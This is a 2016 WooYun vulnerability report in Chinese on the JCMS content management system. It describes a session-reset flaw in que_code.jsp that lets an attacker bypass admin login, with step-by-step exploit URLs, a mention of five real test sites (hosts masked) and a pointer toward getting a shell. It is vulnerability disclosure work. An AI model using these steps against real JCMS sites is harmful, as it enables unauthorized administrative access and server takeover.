漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2016-0178011
漏洞标题:jcms系统session重置导致getshell
相关厂商:南京大汉网络有限公司
漏洞作者: 老虎皮
提交时间:2016-02-23 16:26
修复时间:2016-05-27 12:20
公开时间:2016-05-27 12:20
漏洞类型:设计缺陷/逻辑错误
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2016-02-23: 细节已通知厂商并且等待厂商处理中
2016-02-27: 厂商已经确认,细节仅向厂商公开
2016-03-01: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航、无声信息)
2016-04-22: 细节向核心白帽子及相关领域专家公开
2016-05-02: 细节向普通白帽子公开
2016-05-12: 细节向实习白帽子公开
2016-05-27: 细节向公众公开
简要描述:
详细说明:
jcms系统session重置导致getshell
在/jcms/jcms_files/jcms1/web1/site/module/oss/que_code.jsp
String sessionId = request.getParameter("sessionid");
直接通过sessionid获取值
code1.setSessionName(sessionId);
然后又直接设置session
而在我们的jcms中的setup(后台管理制作端)中又只判断其中cookie_username是否为空
不为空即就登录
可参考如下:
http://**.**.**.**/bugs/wooyun-2015-0107138
利用过程如下:
1、**.**.**.**/jcms/setup/opr_licenceinfo.jsp(如果后台未更改或者未设置权限提交下)
你会发现需要登录
2、**.**.**.**/jcms/jcms_files/jcms1/web1/site/module/oss/que_code.jsp?sessionid=cookie_username
3、再次访问**.**.**.**/jcms/setup/opr_licenceinfo.jsp即可
提供5个测试案例
http://**.**.**.**
http://**.**.**.**
http://**.**.**.**
**.**.**.**
**.**.**.**:8080
**.**.**.**
选取其中做演示
**.**.**.**
后台getshell参考http://**.**.**.**/bugs/wooyun-2014-061360
就不一一shell了
http://**.**.**.**/jcms/setup/opr_licenceinfo.jsp
漏洞证明:
修复方案:
版权声明:转载请注明来源 老虎皮@乌云
漏洞回应
厂商回应:
危害等级:低
漏洞Rank:5
确认时间:2016-02-27 12:12
厂商回复:
最新状态:
暂无